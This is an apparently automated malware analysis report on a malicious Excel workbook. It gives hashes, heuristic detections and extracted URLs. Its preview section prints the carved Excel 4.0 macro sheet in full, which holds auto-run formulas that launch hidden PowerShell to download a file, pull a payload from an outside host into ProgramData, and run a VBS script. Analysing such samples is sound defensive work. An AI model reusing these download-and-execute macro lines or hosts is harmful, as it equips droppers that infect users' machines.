Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b8f2a0fb47e39ee3…

MALICIOUS

Office (OOXML)

6.8 KB Created: 2007-04-03 04:03:07 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-10-31
MD5: 77d8f37eab6943a7261bf1b75b7851d5 SHA-1: 8d4ca8346c0b00285ee4ecd4d8e5f210228bf7cf SHA-256: b8f2a0fb47e39ee3876f8ae51ff11f167f0b1949a1f66c831062b616ded2eabd
202 Risk Score

Heuristics 5

  • Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: EXEC, CALL, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://divineleverage.org/de.php In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmIn document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1889 bytes
SHA-256: 7bb40366171d417099ae4d9e21d3cb4d343e2db7055e9c09809491d824d2eebd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="ED97:ED188"/><sheetViews><sheetView showFormulas="1" tabSelected="1" topLeftCell="DY163" workbookViewId="0"><selection activeCell="ED171" sqref="ED171"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="133" width="9.140625" style="1"/><col min="134" max="134" width="78.5703125" style="1" customWidth="1"/><col min="135" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="97" spans="134:134" x14ac:dyDescent="0.25"><c r="ED97" s="1" t="s"><v>0</v></c></row><row r="173" spans="134:134" x14ac:dyDescent="0.25"><c r="ED173" s="1" t="b"><f>EXEC("powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile(https://drive.google.com/uc?export=download&amp;id=0B1NUTMCAOKBTdVQzTXlUNHBm")</f><v>0</v></c></row><row r="175" spans="134:134" x14ac:dyDescent="0.25"><c r="ED175" s="1"><f>CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"https://divineleverage.org/de.php","C:\ProgramData\6.msi",0,0)</f><v>0</v></c></row><row r="177" spans="134:134" x14ac:dyDescent="0.25"><c r="ED177" s="1"><f>EXEC("wscript C:\ProgramData\ED.vbs")</f><v>33</v></c></row><row r="188" spans="134:134" x14ac:dyDescent="0.25"><c r="ED188" s="1" t="b"><f>HALT()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.